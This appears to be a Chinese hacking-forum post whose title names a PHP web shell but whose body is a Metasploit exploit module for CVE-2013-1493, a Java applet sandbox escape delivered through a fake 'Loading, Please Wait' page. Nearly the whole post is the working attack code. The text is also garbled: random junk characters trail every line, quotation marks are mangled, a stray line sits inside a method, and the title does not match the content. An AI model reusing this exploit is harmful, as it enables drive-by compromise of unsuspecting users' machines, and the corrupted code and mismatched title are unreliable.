找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2286|回复: 0
打印 上一主题 下一主题

STUNSHELL PHP Web Shell远程执行代码

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:31:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
##
/ s4 r7 a% [! R5 g8 \. n3 Q) J9 x  C% F+ Y
# This file is part of the Metasploit Framework and may be subject to0 O6 o. C- P2 \" T7 W$ w
# redistribution and commercial restrictions. Please see the Metasploit
& Y3 v4 S# h) ^# web site for more information on licensing and terms of use.
0 x7 `5 h% n' A6 v' w# http://metasploit.com/' |1 I- p3 X% q. y! w  w6 S$ Z
##
" t0 F: E: ?1 r* y2 urequire ‘msf/core’
4 X$ X6 r9 T7 O9 ^require ‘rex’
# T$ |/ b$ V, j* G9 k- Gclass Metasploit3 < Msf::Exploit::Remote$ n9 D& f5 u: L6 f9 O0 D
Rank = NormalRanking
$ z- [; h! w  [3 ]include Msf::Exploit::Remote::HttpServer::HTML$ @: B; S. H' _3 x7 x2 h  I
include Msf::Exploit::EXE
: U* i7 `; G! linclude Msf::Exploit::Remote::BrowserAutopwn
2 d9 }/ G4 t! a) b; tautopwn_info({ :javascript => false })$ y* w! Z8 f7 p  V
def initialize( info = {} )
% \- |0 g( o0 f( [. s% V4 Q4 ysuper( update_info( info,
6 m2 P( d! K4 N9 L  h4 p& o* G/ O‘Name’ => ‘Java CMM Remote Code Execution’,  C% Q) Y) [5 `# g5 V% }5 D1 F
‘Description’ => %q{' i- u: ]6 {9 [& Y  K
This module abuses the Color Management classes from a Java Applet to run, o$ m2 ?, R, ]
arbitrary Java code outside of the sandbox as exploited in the wild in February
% m; V- z/ [. d" M% i1 ?and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41) {6 i! F0 k/ o3 D( I
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1+ u0 I  J8 _0 m( T* m& u
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java# F2 R# s1 m& M; e& g! a
warning in order to run the malicious applet.2 u" \8 V  p, b* G* }2 e
},
1 c8 {/ z, e; o3 O1 ?2 _' `9 {‘License’ => MSF_LICENSE,
% v! U; z+ J' t5 P1 W0 x! O1 }‘Author’ =>" O8 O% s3 u2 h) F- [! g% Q* j/ f
'Unknown', # Vulnerability discovery and Exploit+ O# f% ]1 h) s/ O$ s' N
'juan vazquez' # Metasploit module (just ported the published exploit)! l, O# i+ j5 u/ F( n) H" J
],: [1 ]7 p) H! _3 n6 _
‘References’ =>8 x' Q2 }" C6 G
[
! V+ p: Q) Z( e. n[ 'CVE', '2013-1493' ],
  v2 L9 E) ^7 u, O; e3 q/ E5 z[ 'OSVDB', '90737' ],8 a$ P. g+ D2 Y; e+ ?. P1 f9 R
[ 'BID', '58238' ],
2 P- d% a: Q- g* M[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
. ^5 c4 N5 E; _' Z: B[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
) A$ H& u! ~/ @7 n, [" l3 P[ 'URL', 'http://pastie.org/pastes/6581034' ]
7 ?4 i/ L2 D  [7 s# j3 F7 c' N; z],
# j6 F% r/ \5 n) x. ^6 B' v‘Platform’ => [ 'win', 'java' ],* z  N4 a* t% s
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
* ]0 v3 ?3 P( Y" u  H5 Z. U9 S! }) z‘Targets’ =>- H$ X- P* g( t$ R2 L1 j
[: @$ [# r; `5 g
[ 'Generic (Java Payload)',1 ~7 T! Q0 o1 Q3 A( }! p
{
9 \5 I" V6 u9 g8 H4 \+ @8 }'Platform' => 'java',3 U9 K1 m) p7 Q8 y; o! ~
'Arch' => ARCH_JAVA
9 N# y- J/ g$ D" \/ c}, M2 P: L2 Q' f! q$ B1 T
],
0 v, Z* X( h6 c4 @[ 'Windows x86 (Native Payload)',
( N' F6 A) p- l0 B1 o1 w0 f{
$ ?) `/ L5 [3 ]) C2 m% h3 ^'Platform' => 'win',/ ~$ K" F/ I' m( {$ u
'Arch' => ARCH_X86
; d8 j) D5 D1 G, T! y  L4 I3 S+ o}: S+ i% W$ _9 C  k
]
" r  L1 L) e$ Y9 ~],
( z0 E0 |' D; a/ T‘‘DisclosureDate’ => ‘Mar 01 2013′9 m7 t5 R) ]4 R/ _; d
))
5 s$ O: E& U$ R1 A3 R; C# e  U$ ^- xend
8 w0 G- ]4 G5 Odef setup  _+ Q" Y' G- U2 C$ k: J& F/ S% Y
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
7 T8 I0 T! R2 r: _8 L! o@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }7 z# c, L5 N) @. J' ~+ ?0 w9 v+ S
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)7 A3 P: [7 x. O  R' i5 n
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
8 l9 c% q' C9 ^' Npath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
% J  I+ F2 T  v6 j@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
6 U5 n4 j2 r. n( |6 E& Spath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
! ^6 C$ G; V' m- u1 o0 e6 M@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }5 x8 s( u# h8 b9 }
@init_class_name = rand_text_alpha(“Init”.length)# N/ v4 `, l8 n
@init_class.gsub!(“Init”, @init_class_name)( n. K/ \* {5 z8 p+ d. \& P: u
super( F( ^3 O9 O5 N- p. {& L
end
% ~7 K$ \' H# @' Idef on_request_uri(cli, request)
* v+ D5 _" l7 a8 z. mprint_status(“handling request for #{request.uri}”)
3 f  x- ^# w$ L2 K, ucase request.uri
0 i" A4 ?% G- x0 c; J. qwhen /\.jar$/i8 O! F+ a. w" P+ z$ t
jar = payload.encoded_jar+ g* h3 r6 z# D+ m
jar.add_file(“#{@init_class_name}.class”, @init_class)
* H7 M% i  o% H) n: t& p7 ajar.add_file(“Leak.class”, @leak_class)8 k( G4 e1 i2 \; r, x
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)! c1 g3 @2 {4 z+ \  v
jar.add_file(“MyColorSpace.class”, @color_space_class)
/ f! i7 ]. k- m  _, O5 \" @$ H7 zDefaultTarget’ => 1,0 C9 q! }* ]& ?1 [1 e2 L
metasploit_str = rand_text_alpha(“metasploit”.length); n( J5 e) h3 m2 V
payload_str = rand_text_alpha(“payload”.length)2 w8 ?6 w3 ?7 }  Y1 d& O7 [" g
jar.entries.each { |entry|
/ _7 B: c( I: x, Hentry.name.gsub!(“metasploit”, metasploit_str)
5 C# i. n1 Y5 F6 G0 M4 @0 v. ]entry.name.gsub!(“Payload”, payload_str)
  w: ?  m, B# I1 A; m4 K9 Fentry.data = entry.data.gsub(“metasploit”, metasploit_str)
- N! Q3 c  V0 Y% {entry.data = entry.data.gsub(“Payload”, payload_str)0 @3 [6 t% k. d
}5 _1 Z% t. Q6 V; z0 s: X
jar.build_manifest
  W7 x% O4 O+ l" N% tsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
2 ?* a4 G  a6 c* M4 Y$ owhen /\/$/6 v. k' G* M$ _
payload = regenerate_payload(cli)% N, W9 Q9 k: d3 h2 W5 \
if not payload5 r) k! H; t6 }: u
print_error(“Failed to generate the payload.”)
; f2 ^% h# ?( u  b8 [; B1 U8 Osend_not_found(cli)6 \0 ?& ~) a* g# N
return* Z3 i  @! c1 w; k
end
; z* u' A/ I6 ?/ bsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })% p9 g) q6 D; J  Z* f6 K
else
. A0 M& d- ?: Ssend_redirect(cli, get_resource() + ‘/’, ”)7 X. U  d4 X  I2 B: x6 _# g0 s" b
end+ A: R0 r4 y6 t6 r7 U0 W
end
( O  z6 j  s4 }. w" Y  ]7 B0 Bdef generate_html
: _/ [! o& N0 R% L& |) yhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|+ \" p; a. G& ~1 v0 f6 M
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|3 x+ f& P) p% j0 T& n
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|: ?2 f- ~- b! }* m8 A$ X) o, M
html += %Q|</applet></body></html>|
- M' r; E4 e( P! q/ J. ^return html- Q1 t0 S- h' X) a! k- b- R( F1 \9 J
end
+ q: N% L" ~! ?* B3 A8 x$ cend
$ c- H$ G! f+ y6 @end* h4 X" P# }9 w! A) b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表